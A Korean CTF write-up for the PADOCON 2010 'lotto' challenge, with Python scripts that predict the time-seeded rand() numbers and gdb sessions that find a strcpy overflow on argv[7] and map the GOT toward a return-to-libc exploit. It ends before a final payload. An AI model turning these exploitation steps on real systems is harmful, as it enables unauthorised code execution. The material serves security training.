PADOCON 2010 CTF trililogy200 풀이 – RTL

이번 문제의 풀이는 이렇다. 우선 로또번호 6 자리를 맞추어야 한다. 그리고 맞추고 나면 argv[7] 값을 strcpy() 함수를 이용하 복사를 하나 이부분에서 오버플로우가 발생한다. 다만 역시 랜덤스택이라 RTL을 이용하여 풀이을 하여야 한다.

우선 로또값을 맞추는 코드부터 작성해 보자.
[code lang-python]#!/usr/bin/python
import os, re
p = os.popen(‘./lotto 1 2 3 4 5 6’, ‘r’, 512)
data =  p.readlines()

tmp = re.findall(‘\d+’, data[2])
number = ‘ ‘.join(tmp)

payload = ‘./lotto ‘ + number
os.system(payload)
[/code]

추가로 popen() 을 쓰지 않고 seed 값을 알므로 아래와 같이 작성하여 맞출수도 있다.
[code lang-python]#!/usr/bin/env python
import os
from ctypes import *

libc = CDLL("libc.so.6")
srand = libc.srand
rand = libc.rand
time = libc.time
srand(time(None))

num_list = []
for x in range(6):
    num_list.append(str(rand() % 45 +1))
number = ‘ ‘.join(num_list)

os.system(‘./lotto ‘ + number)
[/code]

[code lang-bash]root@ubuntu:~# ./test.py
This is lotto program!! Write 6 numbers.

 >> Lotto number is 44 15 30 14 26 5
Input number is 44 15 30 14 26 5

Congratulation!!
[/code]

로또 번호는 정확하게 맞추는 것을 확인했다. 이제 argv[7] 값을 입력해 공격을 해보도록 하자.
[code lang-bash]root@ubuntu:~# gdb lotto
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html&gt;
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"…
(no debugging symbols found)
(gdb) disassemble main
Dump of assembler code for function main:
0x08048534 <main+0>:    push   %ebp
0x08048535 <main+1>:    mov    %esp,%ebp
0x08048537 <main+3>:    push   %ebx
0x08048538 <main+4>:    sub    $0x54,%esp
0x0804853b <main+7>:    movw   $0x0,-0x6(%ebp)
0x08048541 <main+13>:   movl   $0x0,-0x1c(%ebp)
0x08048548 <main+20>:   movl   $0x0,(%esp)
0x0804854f <main+27>:   call   0x8048450 <time@plt>
0x08048554 <main+32>:   mov    %eax,(%esp)
0x08048557 <main+35>:   call   0x80483d0 <srand@plt>
0x0804855c <main+40>:   movl   $0x0,-0x10(%ebp)
0x08048563 <main+47>:   jmp    0x80485d9 <main+165>
0x08048565 <main+49>:   call   0x8048470 <rand@plt>
0x0804856a <main+54>:   mov    %eax,%ecx
0x0804856c <main+56>:   mov    $0xb60b60b7,%edx
0x08048571 <main+61>:   mov    %ecx,%eax
0x08048573 <main+63>:   imul   %edx
0x08048575 <main+65>:   lea    (%edx,%ecx,1),%eax
0x08048578 <main+68>:   mov    %eax,%edx
0x0804857a <main+70>:   sar    $0x5,%edx
0x0804857d <main+73>:   mov    %ecx,%eax
0x0804857f <main+75>:   sar    $0x1f,%eax
0x08048582 <main+78>:   mov    %edx,%ebx
0x08048584 <main+80>:   sub    %eax,%ebx
0x08048586 <main+82>:   mov    %ebx,%eax
0x08048588 <main+84>:   imul   $0x2d,%eax,%eax
0x0804858b <main+87>:   mov    %ecx,%edx
0x0804858d <main+89>:   sub    %eax,%edx
0x0804858f <main+91>:   mov    %edx,%eax
0x08048591 <main+93>:   add    $0x1,%eax
0x08048594 <main+96>:   mov    %eax,-0x18(%ebp)
0x08048597 <main+99>:   movl   $0x0,-0x14(%ebp)
0x0804859e <main+106>:  jmp    0x80485bd <main+137>
0x080485a0 <main+108>:  mov    -0x14(%ebp),%eax
0x080485a3 <main+111>:  mov    -0x4c(%ebp,%eax,4),%eax
0x080485a7 <main+115>:  cmp    -0x18(%ebp),%eax
0x080485aa <main+118>:  jne    0x80485b9 <main+133>
0x080485ac <main+120>:  subl   $0x1,-0x10(%ebp)
0x080485b0 <main+124>:  movl   $0x0,-0x18(%ebp)
0x080485b7 <main+131>:  jmp    0x80485c5 <main+145>
0x080485b9 <main+133>:  addl   $0x1,-0x14(%ebp)
0x080485bd <main+137>:  mov    -0x14(%ebp),%eax
0x080485c0 <main+140>:  cmp    -0x10(%ebp),%eax
0x080485c3 <main+143>:  jl     0x80485a0 <main+108>
0x080485c5 <main+145>:  cmpl   $0x0,-0x18(%ebp)
0x080485c9 <main+149>:  je     0x80485d5 <main+161>
0x080485cb <main+151>:  mov    -0x10(%ebp),%eax
—Type <return> to continue, or q <return> to quit—
0x080485ce <main+154>:  mov    -0x18(%ebp),%edx
0x080485d1 <main+157>:  mov    %edx,-0x4c(%ebp,%eax,4)
0x080485d5 <main+161>:  addl   $0x1,-0x10(%ebp)
0x080485d9 <main+165>:  cmpl   $0x5,-0x10(%ebp)
0x080485dd <main+169>:  jle    0x8048565 <main+49>
0x080485df <main+171>:  mov    $0x80488e4,%eax
0x080485e4 <main+176>:  mov    %eax,(%esp)
0x080485e7 <main+179>:  call   0x8048430 <printf@plt>
0x080485ec <main+184>:  cmpl   $0x6,0x8(%ebp)
0x080485f0 <main+188>:  jg     0x8048608 <main+212>
0x080485f2 <main+190>:  movl   $0x8048913,(%esp)
0x080485f9 <main+197>:  call   0x8048460 <puts@plt>
0x080485fe <main+202>:  mov    $0x0,%eax
0x08048603 <main+207>:  jmp    0x804880e <main+730>
0x08048608 <main+212>:  movl   $0x0,-0x10(%ebp)
0x0804860f <main+219>:  jmp    0x8048700 <main+460>
0x08048614 <main+224>:  cmpl   $0x5,-0x10(%ebp)
0x08048618 <main+228>:  jne    0x80486df <main+427>
0x0804861e <main+234>:  mov    -0x10(%ebp),%eax
0x08048621 <main+237>:  add    $0x1,%eax
0x08048624 <main+240>:  shl    $0x2,%eax
0x08048627 <main+243>:  add    0xc(%ebp),%eax
0x0804862a <main+246>:  mov    (%eax),%eax
0x0804862c <main+248>:  mov    %eax,(%esp)
0x0804862f <main+251>:  call   0x8048410 <strlen@plt>
0x08048634 <main+256>:  cmp    $0x1,%eax
0x08048637 <main+259>:  jne    0x804866d <main+313>
0x08048639 <main+261>:  mov    -0x10(%ebp),%eax
0x0804863c <main+264>:  add    $0x1,%eax
0x0804863f <main+267>:  shl    $0x2,%eax
0x08048642 <main+270>:  add    0xc(%ebp),%eax
0x08048645 <main+273>:  mov    (%eax),%eax
0x08048647 <main+275>:  movl   $0x1,0x8(%esp)
0x0804864f <main+283>:  mov    %eax,0x4(%esp)
0x08048653 <main+287>:  lea    -0x6(%ebp),%eax
0x08048656 <main+290>:  mov    %eax,(%esp)
0x08048659 <main+293>:  call   0x80483f0 <strncpy@plt>
0x0804865e <main+298>:  movzbl -0x6(%ebp),%eax
0x08048662 <main+302>:  movsbl %al,%eax
0x08048665 <main+305>:  sub    $0x30,%eax
0x08048668 <main+308>:  mov    %eax,-0x18(%ebp)
0x0804866b <main+311>:  jmp    0x80486d3 <main+415>
0x0804866d <main+313>:  mov    -0x10(%ebp),%eax
0x08048670 <main+316>:  add    $0x1,%eax
0x08048673 <main+319>:  shl    $0x2,%eax
0x08048676 <main+322>:  add    0xc(%ebp),%eax
0x08048679 <main+325>:  mov    (%eax),%eax
0x0804867b <main+327>:  mov    %eax,(%esp)
—Type <return> to continue, or q <return> to quit—
0x0804867e <main+330>:  call   0x8048410 <strlen@plt>
0x08048683 <main+335>:  cmp    $0x1,%eax
0x08048686 <main+338>:  jbe    0x80486d3 <main+415>
0x08048688 <main+340>:  mov    -0x10(%ebp),%eax
0x0804868b <main+343>:  add    $0x1,%eax
0x0804868e <main+346>:  shl    $0x2,%eax
0x08048691 <main+349>:  add    0xc(%ebp),%eax
0x08048694 <main+352>:  mov    (%eax),%eax
0x08048696 <main+354>:  movl   $0x2,0x8(%esp)
0x0804869e <main+362>:  mov    %eax,0x4(%esp)
0x080486a2 <main+366>:  lea    -0x6(%ebp),%eax
0x080486a5 <main+369>:  mov    %eax,(%esp)
0x080486a8 <main+372>:  call   0x80483f0 <strncpy@plt>
0x080486ad <main+377>:  movzbl -0x6(%ebp),%eax
0x080486b1 <main+381>:  movsbl %al,%edx
0x080486b4 <main+384>:  mov    %edx,%eax
0x080486b6 <main+386>:  shl    $0x2,%eax
0x080486b9 <main+389>:  add    %edx,%eax
0x080486bb <main+391>:  add    %eax,%eax
0x080486bd <main+393>:  lea    -0x1e0(%eax),%edx
0x080486c3 <main+399>:  movzbl -0x5(%ebp),%eax
0x080486c7 <main+403>:  movsbl %al,%eax
0x080486ca <main+406>:  lea    (%edx,%eax,1),%eax
0x080486cd <main+409>:  sub    $0x30,%eax
0x080486d0 <main+412>:  mov    %eax,-0x18(%ebp)
0x080486d3 <main+415>:  mov    -0x10(%ebp),%eax
0x080486d6 <main+418>:  mov    -0x18(%ebp),%edx
0x080486d9 <main+421>:  mov    %edx,-0x34(%ebp,%eax,4)
0x080486dd <main+425>:  jmp    0x80486fc <main+456>
0x080486df <main+427>:  mov    -0x10(%ebp),%ebx
0x080486e2 <main+430>:  mov    -0x10(%ebp),%eax
0x080486e5 <main+433>:  add    $0x1,%eax
0x080486e8 <main+436>:  shl    $0x2,%eax
0x080486eb <main+439>:  add    0xc(%ebp),%eax
0x080486ee <main+442>:  mov    (%eax),%eax
0x080486f0 <main+444>:  mov    %eax,(%esp)
0x080486f3 <main+447>:  call   0x8048440 <atoi@plt>
0x080486f8 <main+452>:  mov    %eax,-0x34(%ebp,%ebx,4)
0x080486fc <main+456>:  addl   $0x1,-0x10(%ebp)
0x08048700 <main+460>:  cmpl   $0x5,-0x10(%ebp)
0x08048704 <main+464>:  jle    0x8048614 <main+224>
0x0804870a <main+470>:  mov    $0x804892d,%eax
0x0804870f <main+475>:  mov    %eax,(%esp)
0x08048712 <main+478>:  call   0x8048430 <printf@plt>
0x08048717 <main+483>:  movl   $0x0,-0x10(%ebp)
0x0804871e <main+490>:  jmp    0x804873c <main+520>
0x08048720 <main+492>:  mov    -0x10(%ebp),%eax
0x08048723 <main+495>:  mov    -0x4c(%ebp,%eax,4),%edx
—Type <return> to continue, or q <return> to quit—
0x08048727 <main+499>:  mov    $0x804893e,%eax
0x0804872c <main+504>:  mov    %edx,0x4(%esp)
0x08048730 <main+508>:  mov    %eax,(%esp)
0x08048733 <main+511>:  call   0x8048430 <printf@plt>
0x08048738 <main+516>:  addl   $0x1,-0x10(%ebp)
0x0804873c <main+520>:  cmpl   $0x5,-0x10(%ebp)
0x08048740 <main+524>:  jle    0x8048720 <main+492>
0x08048742 <main+526>:  mov    $0x8048942,%eax
0x08048747 <main+531>:  mov    %eax,(%esp)
0x0804874a <main+534>:  call   0x8048430 <printf@plt>
0x0804874f <main+539>:  movl   $0x0,-0x10(%ebp)
0x08048756 <main+546>:  jmp    0x8048774 <main+576>
0x08048758 <main+548>:  mov    -0x10(%ebp),%eax
0x0804875b <main+551>:  mov    -0x34(%ebp,%eax,4),%edx
0x0804875f <main+555>:  mov    $0x804893e,%eax
0x08048764 <main+560>:  mov    %edx,0x4(%esp)
0x08048768 <main+564>:  mov    %eax,(%esp)
0x0804876b <main+567>:  call   0x8048430 <printf@plt>
0x08048770 <main+572>:  addl   $0x1,-0x10(%ebp)
0x08048774 <main+576>:  cmpl   $0x5,-0x10(%ebp)
0x08048778 <main+580>:  jle    0x8048758 <main+548>
0x0804877a <main+582>:  movl   $0x8048954,(%esp)
0x08048781 <main+589>:  call   0x8048460 <puts@plt>
0x08048786 <main+594>:  movl   $0x0,-0x1c(%ebp)
0x0804878d <main+601>:  movl   $0x0,-0x10(%ebp)
0x08048794 <main+608>:  jmp    0x8048803 <main+719>
0x08048796 <main+610>:  movl   $0x0,-0x14(%ebp)
0x0804879d <main+617>:  jmp    0x80487f6 <main+706>
0x0804879f <main+619>:  mov    -0x10(%ebp),%eax
0x080487a2 <main+622>:  mov    -0x4c(%ebp,%eax,4),%edx
0x080487a6 <main+626>:  mov    -0x14(%ebp),%eax
0x080487a9 <main+629>:  mov    -0x34(%ebp,%eax,4),%eax
0x080487ad <main+633>:  cmp    %eax,%edx
0x080487af <main+635>:  jne    0x80487f2 <main+702>
0x080487b1 <main+637>:  addl   $0x1,-0x1c(%ebp)
0x080487b5 <main+641>:  cmpl   $0x5,-0x10(%ebp)
0x080487b9 <main+645>:  jne    0x80487f2 <main+702>
0x080487bb <main+647>:  cmpl   $0x6,-0x1c(%ebp)
0x080487bf <main+651>:  jne    0x80487f2 <main+702>
0x080487c1 <main+653>:  movl   $0x8048956,(%esp)
0x080487c8 <main+660>:  call   0x8048460 <puts@plt>
0x080487cd <main+665>:  mov    0xc(%ebp),%eax
0x080487d0 <main+668>:  add    $0x1c,%eax
0x080487d3 <main+671>:  mov    (%eax),%eax
0x080487d5 <main+673>:  test   %eax,%eax
0x080487d7 <main+675>:  je     0x80487fe <main+714>
0x080487d9 <main+677>:  mov    0xc(%ebp),%eax
0x080487dc <main+680>:  add    $0x1c,%eax
—Type <return> to continue, or q <return> to quit—
0x080487df <main+683>:  mov    (%eax),%eax
0x080487e1 <main+685>:  mov    %eax,0x4(%esp)
0x080487e5 <main+689>:  lea    -0xa(%ebp),%eax
0x080487e8 <main+692>:  mov    %eax,(%esp)
0x080487eb <main+695>:  call   0x8048420 <strcpy@plt>
0x080487f0 <main+700>:  jmp    0x80487ff <main+715>
0x080487f2 <main+702>:  addl   $0x1,-0x14(%ebp)
0x080487f6 <main+706>:  cmpl   $0x5,-0x14(%ebp)
0x080487fa <main+710>:  jle    0x804879f <main+619>
0x080487fc <main+712>:  jmp    0x80487ff <main+715>
0x080487fe <main+714>:  nop   
0x080487ff <main+715>:  addl   $0x1,-0x10(%ebp)
0x08048803 <main+719>:  cmpl   $0x5,-0x10(%ebp)
0x08048807 <main+723>:  jle    0x8048796 <main+610>
0x08048809 <main+725>:  mov    $0x0,%eax
0x0804880e <main+730>:  add    $0x54,%esp
0x08048811 <main+733>:  pop    %ebx
0x08048812 <main+734>:  pop    %ebp
0x08048813 <main+735>:  ret   
End of assembler dump.
(gdb) b main
Breakpoint 1 at 0x8048538
(gdb) b main+735
Breakpoint 2 at 0x8048813
(gdb) r 1 2 3 4 5 6 AAAA
Starting program: /root/lotto 1 2 3 4 5 6 AAAA
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)

Breakpoint 1, 0x08048538 in main ()
(gdb) jump
main+677
Continuing at 0x80487d9.

Program received signal SIGSEGV, Segmentation fault.
0x08004141 in ?? ()
(gdb) r 1 2 3 4 5 6 AABBBB
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/lotto 1 2 3 4 5 6 AABBBB
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)

Breakpoint 1, 0x08048538 in main ()
(gdb) jump *main+677     
Continuing at 0x80487d9.

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb)
[/code]

argv[7] 값에 넣어야 할 인자의 크기를 정확하게 확인하였다. 이제 RTL을 해보도록 하자.
우선 간단한 GOT를 이용하여 풀이를 하기위해 주소를 확인해 보자.
[code lang-bash]root@ubuntu:~# objdump -R lotto

lotto:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE
08049ac8 R_386_GLOB_DAT    gmon_start
08049ad8 R_386_JUMP_SLOT   srand
08049adc R_386_JUMP_SLOT  
gmon_start

08049ae0 R_386_JUMP_SLOT   strncpy
08049ae4 R_386_JUMP_SLOT   __libc_start_main
08049ae8 R_386_JUMP_SLOT   strlen
08049aec R_386_JUMP_SLOT   strcpy
08049af0 R_386_JUMP_SLOT   printf
08049af4 R_386_JUMP_SLOT   atoi
08049af8 R_386_JUMP_SLOT   time
08049afc R_386_JUMP_SLOT   puts
08049b00 R_386_JUMP_SLOT   rand

root@ubuntu:~# gdb lotto
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html&gt;
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"…
(no debugging symbols found)
(gdb) b main
Breakpoint 1 at 0x8048538
(gdb) r
Starting program: /root/lotto
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)

Breakpoint 1, 0x08048538 in main ()
(gdb) x/32wx 0x08049aec
0x8049aec <_GLOBAL_OFFSETTABLE+32>:   0x08048426      0x08048436      0x08048446      0x08048456
0x8049afc <_GLOBAL_OFFSETTABLE+48>:   0x08048466      0x08048476      0x00000000      0x00000000
0x8049b0c <dtor_idx.5955>:      0x00000000      0x00000000      0x00000000      0x00000000
0x8049b1c:      0x00000000      0x00000000      0x00000000      0x00000000
0x8049b2c:      0x00000000      0x00000000      0x00000000      0x00000000
0x8049b3c:      0x00000000      0x00000000      0x00000000      0x00000000
0x8049b4c:      0x00000000      0x00000000      0x00000000      0x00000000
0x8049b5c:      0x00000000      0x00000000      0x00000000      0x00000000
(gdb) x/32wx 0x08049aec-32
0x8049acc <_GLOBAL_OFFSETTABLE>:      0x08049a00      0xb7f09668      0xb7f00b70      0x080483d6
0x8049adc <_GLOBAL_OFFSETTABLE+16>:   0x080483e6      0x080483f6      0xb7daf370      0x08048416
0x8049aec <_GLOBAL_OFFSETTABLE+32>:   0x08048426      0x08048436      0x08048446      0x08048456
0x8049afc <_GLOBAL_OFFSETTABLE+48>:   0x08048466      0x08048476      0x00000000      0x00000000
0x8049b0c <dtor_idx.5955>:      0x00000000      0x00000000      0x00000000      0x00000000
0x8049b1c:      0x00000000      0x00000000      0x00000000      0x00000000
0x8049b2c:      0x00000000      0x00000000      0x00000000      0x00000000
0x8049b3c:      0x00000000      0x00000000      0x00000000      0x00000000
(gdb)
[/code]

GOT 주소를 확인해보면 0x00이 들어간다. 해당 값을 널이라 인자를 구성할 수 없다.
따라서 "ret" 명령어를 이용한 방법으로 풀이를 해보자.
[code lang-bash]root@ubuntu:~# gdb lotto
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html&gt;
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"…
(no debugging symbols found)
(gdb) disassemble main
Dump of assembler code for function main:
0x08048534 <main+0>:    push   %ebp
0x08048535 <main+1>:    mov    %esp,%ebp
0x08048537 <main+3>:    push   %ebx
0x08048538 <main+4>:    sub    $0x54,%esp
0x0804853b <main+7>:    movw   $0x0,-0x6(%ebp)
0x08048541 <main+13>:   movl   $0x0,-0x1c(%ebp)
0x08048548 <main+20>:   movl   $0x0,(%esp)
0x0804854f <main+27>:   call   0x8048450 <time@plt>
0x08048554 <main+32>:   mov    %eax,(%esp)
0x08048557 <main+35>:   call   0x80483d0 <srand@plt>
0x0804855c <main+40>:   movl   $0x0,-0x10(%ebp)
0x08048563 <main+47>:   jmp    0x80485d9 <main+165>
0x08048565 <main+49>:   call   0x8048470 <rand@plt>
0x0804856a <main+54>:   mov    %eax,%ecx
0x0804856c <main+56>:   mov    $0xb60b60b7,%edx
0x08048571 <main+61>:   mov    %ecx,%eax
0x08048573 <main+63>:   imul   %edx
0x08048575 <main+65>:   lea    (%edx,%ecx,1),%eax
0x08048578 <main+68>:   mov    %eax,%edx
0x0804857a <main+70>:   sar    $0x5,%edx
0x0804857d <main+73>:   mov    %ecx,%eax
0x0804857f <main+75>:   sar    $0x1f,%eax
0x08048582 <main+78>:   mov    %edx,%ebx
0x08048584 <main+80>:   sub    %eax,%ebx
0x08048586 <main+82>:   mov    %ebx,%eax
0x08048588 <main+84>:   imul   $0x2d,%eax,%eax
0x0804858b <main+87>:   mov    %ecx,%edx
0x0804858d <main+89>:   sub    %eax,%edx
0x0804858f <main+91>:   mov    %edx,%eax
0x08048591 <main+93>:   add    $0x1,%eax
0x08048594 <main+96>:   mov    %eax,-0x18(%ebp)
0x08048597 <main+99>:   movl   $0x0,-0x14(%ebp)
0x0804859e <main+106>:  jmp    0x80485bd <main+137>
0x080485a0 <main+108>:  mov    -0x14(%ebp),%eax
0x080485a3 <main+111>:  mov    -0x4c(%ebp,%eax,4),%eax
0x080485a7 <main+115>:  cmp    -0x18(%ebp),%eax
0x080485aa <main+118>:  jne    0x80485b9 <main+133>
0x080485ac <main+120>:  subl   $0x1,-0x10(%ebp)
0x080485b0 <main+124>:  movl   $0x0,-0x18(%ebp)
0x080485b7 <main+131>:  jmp    0x80485c5 <main+145>
0x080485b9 <main+133>:  addl   $0x1,-0x14(%ebp)
0x080485bd <main+137>:  mov    -0x14(%ebp),%eax
0x080485c0 <main+140>:  cmp    -0x10(%ebp),%eax
0x080485c3 <main+143>:  jl     0x80485a0 <main+108>
0x080485c5 <main+145>:  cmpl   $0x0,-0x18(%ebp)
0x080485c9 <main+149>:  je     0x80485d5 <main+161>
0x080485cb <main+151>:  mov    -0x10(%ebp),%eax
—Type <return> to continue, or q <return> to quit—
0x080485ce <main+154>:  mov    -0x18(%ebp),%edx
0x080485d1 <main+157>:  mov    %edx,-0x4c(%ebp,%eax,4)
0x080485d5 <main+161>:  addl   $0x1,-0x10(%ebp)
0x080485d9 <main+165>:  cmpl   $0x5,-0x10(%ebp)
0x080485dd <main+169>:  jle    0x8048565 <main+49>
0x080485df <main+171>:  mov    $0x80488e4,%eax
0x080485e4 <main+176>:  mov    %eax,(%esp)
0x080485e7 <main+179>:  call   0x8048430 <printf@plt>
0x080485ec <main+184>:  cmpl   $0x6,0x8(%ebp)
0x080485f0 <main+188>:  jg     0x8048608 <main+212>
0x080485f2 <main+190>:  movl   $0x8048913,(%esp)
0x080485f9 <main+197>:  call   0x8048460 <puts@plt>
0x080485fe <main+202>:  mov    $0x0,%eax
0x08048603 <main+207>:  jmp    0x804880e <main+730>
0x08048608 <main+212>:  movl   $0x0,-0x10(%ebp)
0x0804860f <main+219>:  jmp    0x8048700 <main+460>
0x08048614 <main+224>:  cmpl   $0x5,-0x10(%ebp)
0x08048618 <main+228>:  jne    0x80486df <main+427>
0x0804861e <main+234>:  mov    -0x10(%ebp),%eax
0x08048621 <main+237>:  add    $0x1,%eax
0x08048624 <main+240>:  shl    $0x2,%eax
0x08048627 <main+243>:  add    0xc(%ebp),%eax
0x0804862a <main+246>:  mov    (%eax),%eax
0x0804862c <main+248>:  mov    %eax,(%esp)
0x0804862f <main+251>:  call   0x8048410 <strlen@plt>
0x08048634 <main+256>:  cmp    $0x1,%eax
0x08048637 <main+259>:  jne    0x804866d <main+313>
0x08048639 <main+261>:  mov    -0x10(%ebp),%eax
0x0804863c <main+264>:  add    $0x1,%eax
0x0804863f <main+267>:  shl    $0x2,%eax
0x08048642 <main+270>:  add    0xc(%ebp),%eax
0x08048645 <main+273>:  mov    (%eax),%eax
0x08048647 <main+275>:  movl   $0x1,0x8(%esp)
0x0804864f <main+283>:  mov    %eax,0x4(%esp)
0x08048653 <main+287>:  lea    -0x6(%ebp),%eax
0x08048656 <main+290>:  mov    %eax,(%esp)
0x08048659 <main+293>:  call   0x80483f0 <strncpy@plt>
0x0804865e <main+298>:  movzbl -0x6(%ebp),%eax
0x08048662 <main+302>:  movsbl %al,%eax
0x08048665 <main+305>:  sub    $0x30,%eax
0x08048668 <main+308>:  mov    %eax,-0x18(%ebp)
0x0804866b <main+311>:  jmp    0x80486d3 <main+415>
0x0804866d <main+313>:  mov    -0x10(%ebp),%eax
0x08048670 <main+316>:  add    $0x1,%eax
0x08048673 <main+319>:  shl    $0x2,%eax
0x08048676 <main+322>:  add    0xc(%ebp),%eax
0x08048679 <main+325>:  mov    (%eax),%eax
0x0804867b <main+327>:  mov    %eax,(%esp)
—Type <return> to continue, or q <return> to quit—
0x0804867e <main+330>:  call   0x8048410 <strlen@plt>
0x08048683 <main+335>:  cmp    $0x1,%eax
0x08048686 <main+338>:  jbe    0x80486d3 <main+415>
0x08048688 <main+340>:  mov    -0x10(%ebp),%eax
0x0804868b <main+343>:  add    $0x1,%eax
0x0804868e <main+346>:  shl    $0x2,%eax
0x08048691 <main+349>:  add    0xc(%ebp),%eax
0x08048694 <main+352>:  mov    (%eax),%eax
0x08048696 <main+354>:  movl   $0x2,0x8(%esp)
0x0804869e <main+362>:  mov    %eax,0x4(%esp)
0x080486a2 <main+366>:  lea    -0x6(%ebp),%eax
0x080486a5 <main+369>:  mov    %eax,(%esp)
0x080486a8 <main+372>:  call   0x80483f0 <strncpy@plt>
0x080486ad <main+377>:  movzbl -0x6(%ebp),%eax
0x080486b1 <main+381>:  movsbl %al,%edx
0x080486b4 <main+384>:  mov    %edx,%eax
0x080486b6 <main+386>:  shl    $0x2,%eax
0x080486b9 <main+389>:  add    %edx,%eax
0x080486bb <main+391>:  add    %eax,%eax
0x080486bd <main+393>:  lea    -0x1e0(%eax),%edx
0x080486c3 <main+399>:  movzbl -0x5(%ebp),%eax
0x080486c7 <main+403>:  movsbl %al,%eax
0x080486ca <main+406>:  lea    (%edx,%eax,1),%eax
0x080486cd <main+409>:  sub    $0x30,%eax
0x080486d0 <main+412>:  mov    %eax,-0x18(%ebp)
0x080486d3 <main+415>:  mov    -0x10(%ebp),%eax
0x080486d6 <main+418>:  mov    -0x18(%ebp),%edx
0x080486d9 <main+421>:  mov    %edx,-0x34(%ebp,%eax,4)
0x080486dd <main+425>:  jmp    0x80486fc <main+456>
0x080486df <main+427>:  mov    -0x10(%ebp),%ebx
0x080486e2 <main+430>:  mov    -0x10(%ebp),%eax
0x080486e5 <main+433>:  add    $0x1,%eax
0x080486e8 <main+436>:  shl    $0x2,%eax
0x080486eb <main+439>:  add    0xc(%ebp),%eax
0x080486ee <main+442>:  mov    (%eax),%eax
0x080486f0 <main+444>:  mov    %eax,(%esp)
0x080486f3 <main+447>:  call   0x8048440 <atoi@plt>
0x080486f8 <main+452>:  mov    %eax,-0x34(%ebp,%ebx,4)
0x080486fc <main+456>:  addl   $0x1,-0x10(%ebp)
0x08048700 <main+460>:  cmpl   $0x5,-0x10(%ebp)
0x08048704 <main+464>:  jle    0x8048614 <main+224>
0x0804870a <main+470>:  mov    $0x804892d,%eax
0x0804870f <main+475>:  mov    %eax,(%esp)
0x08048712 <main+478>:  call   0x8048430 <printf@plt>
0x08048717 <main+483>:  movl   $0x0,-0x10(%ebp)
0x0804871e <main+490>:  jmp    0x804873c <main+520>
0x08048720 <main+492>:  mov    -0x10(%ebp),%eax
0x08048723 <main+495>:  mov    -0x4c(%ebp,%eax,4),%edx
—Type <return> to continue, or q <return> to quit—
0x08048727 <main+499>:  mov    $0x804893e,%eax
0x0804872c <main+504>:  mov    %edx,0x4(%esp)
0x08048730 <main+508>:  mov    %eax,(%esp)
0x08048733 <main+511>:  call   0x8048430 <printf@plt>
0x08048738 <main+516>:  addl   $0x1,-0x10(%ebp)
0x0804873c <main+520>:  cmpl   $0x5,-0x10(%ebp)
0x08048740 <main+524>:  jle    0x8048720 <main+492>
0x08048742 <main+526>:  mov    $0x8048942,%eax
0x08048747 <main+531>:  mov    %eax,(%esp)
0x0804874a <main+534>:  call   0x8048430 <printf@plt>
0x0804874f <main+539>:  movl   $0x0,-0x10(%ebp)
0x08048756 <main+546>:  jmp    0x8048774 <main+576>
0x08048758 <main+548>:  mov    -0x10(%ebp),%eax
0x0804875b <main+551>:  mov    -0x34(%ebp,%eax,4),%edx
0x0804875f <main+555>:  mov    $0x804893e,%eax
0x08048764 <main+560>:  mov    %edx,0x4(%esp)
0x08048768 <main+564>:  mov    %eax,(%esp)
0x0804876b <main+567>:  call   0x8048430 <printf@plt>
0x08048770 <main+572>:  addl   $0x1,-0x10(%ebp)
0x08048774 <main+576>:  cmpl   $0x5,-0x10(%ebp)
0x08048778 <main+580>:  jle    0x8048758 <main+548>
0x0804877a <main+582>:  movl   $0x8048954,(%esp)
0x08048781 <main+589>:  call   0x8048460 <puts@plt>
0x08048786 <main+594>:  movl   $0x0,-0x1c(%ebp)
0x0804878d <main+601>:  movl   $0x0,-0x10(%ebp)
0x08048794 <main+608>:  jmp    0x8048803 <main+719>
0x08048796 <main+610>:  movl   $0x0,-0x14(%ebp)
0x0804879d <main+617>:  jmp    0x80487f6 <main+706>
0x0804879f <main+619>:  mov    -0x10(%ebp),%eax
0x080487a2 <main+622>:  mov    -0x4c(%ebp,%eax,4),%edx
0x080487a6 <main+626>:  mov    -0x14(%ebp),%eax
0x080487a9 <main+629>:  mov    -0x34(%ebp,%eax,4),%eax
0x080487ad <main+633>:  cmp    %eax,%edx
0x080487af <main+635>:  jne    0x80487f2 <main+702>
0x080487b1 <main+637>:  addl   $0x1,-0x1c(%ebp)
0x080487b5 <main+641>:  cmpl   $0x5,-0x10(%ebp)
0x080487b9 <main+645>:  jne    0x80487f2 <main+702>
0x080487bb <main+647>:  cmpl   $0x6,-0x1c(%ebp)
0x080487bf <main+651>:  jne    0x80487f2 <main+702>
0x080487c1 <main+653>:  movl   $0x8048956,(%esp)
0x080487c8 <main+660>:  call   0x8048460 <puts@plt>
0x080487cd <main+665>:  mov    0xc(%ebp),%eax
0x080487d0 <main+668>:  add    $0x1c,%eax
0x080487d3 <main+671>:  mov    (%eax),%eax
0x080487d5 <main+673>:  test   %eax,%eax
0x080487d7 <main+675>:  je     0x80487fe <main+714>
0x080487d9 <main+677>:  mov    0xc(%ebp),%eax
0x080487dc <main+680>:  add    $0x1c,%eax
—Type <return> to continue, or q <return> to quit—
0x080487df <main+683>:  mov    (%eax),%eax
0x080487e1 <main+685>:  mov    %eax,0x4(%esp)
0x080487e5 <main+689>:  lea    -0xa(%ebp),%eax
0x080487e8 <main+692>:  mov    %eax,(%esp)
0x080487eb <main+695>:  call   0x8048420 <strcpy@plt>
0x080487f0 <main+700>:  jmp    0x80487ff <main+715>
